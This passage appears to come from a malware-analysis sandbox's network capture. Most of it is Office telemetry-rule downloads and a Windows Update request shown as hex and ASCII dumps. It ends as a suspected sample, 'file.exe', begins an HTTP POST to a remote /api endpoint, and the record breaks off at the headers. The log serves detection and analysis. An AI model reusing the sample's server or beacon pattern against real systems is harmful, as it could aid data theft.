                                                                                                                                                                                                                      Content-Length: 499
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                      x-ms-request-id: be70ec4e-301e-000c-088c-3a323f000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164138Z-1777c6cb7544nvmshC1TEBf7qc00000009ng00000000kxmt
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:38 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      36192.168.2.74973913.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:37 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:38 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 428
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                      x-ms-request-id: c49e358a-d01e-008e-6463-3b387a000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164138Z-185f5d8b95cp7lkfhC1NYC7rpw0000000an000000000hbfg
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:38 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      37192.168.2.74974313.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:37 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:38 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                                                                      x-ms-request-id: 657669b3-a01e-0002-118c-3a5074000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164138Z-r1d97b99577ndm4rhC1TEBf0ps00000009a00000000049bv
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:38 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      38192.168.2.74973620.12.23.50443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:38 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1ChdEyHYRNkdE3F&MD=2f2hpuyv HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                                                                                                      2024-11-20 16:41:39 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                      MS-CorrelationId: 2b64222a-0a5d-410a-ab3e-25a2ddbcb6bd
                                                                                                                                                                                                                      MS-RequestId: 95c324d6-5ac1-443f-bdbc-19f4aee1892a
                                                                                                                                                                                                                      MS-CV: So3PrF5VsEiI2LcI.0
                                                                                                                                                                                                                      X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:38 GMT
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Length: 24490
                                                                                                                                                                                                                      2024-11-20 16:41:39 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                      2024-11-20 16:41:39 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      39192.168.2.74974513.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:39 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:40 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 494
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                      x-ms-request-id: 65766a7e-a01e-0002-4f8c-3a5074000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164140Z-1777c6cb754xjpthhC1TEBexs800000009s0000000007s8x
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:40 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      40192.168.2.74974913.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:40 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:40 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 486
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                      x-ms-request-id: ac667451-e01e-003c-3e8c-3ac70b000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164140Z-r1d97b99577kk29chC1TEBemmg000000095000000000dzab
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:40 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      41192.168.2.74974613.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:40 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:40 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 420
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                      x-ms-request-id: 65766a9d-a01e-0002-6d8c-3a5074000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164140Z-1777c6cb754xlpjshC1TEBv8cc00000009x000000000uzz1
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:40 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      42192.168.2.74974813.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:40 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:40 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                      x-ms-request-id: 538c974f-101e-0028-648c-3a8f64000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164140Z-1777c6cb754lvj6mhC1TEBke940000000a00000000003637
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:40 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      43192.168.2.74974713.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:40 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:40 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                      x-ms-request-id: fdab78a3-101e-005a-1d8c-3a882b000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164140Z-185f5d8b95cp7lkfhC1NYC7rpw0000000aqg000000004nst
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:40 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      44192.168.2.749757104.21.66.384437476C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:42 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
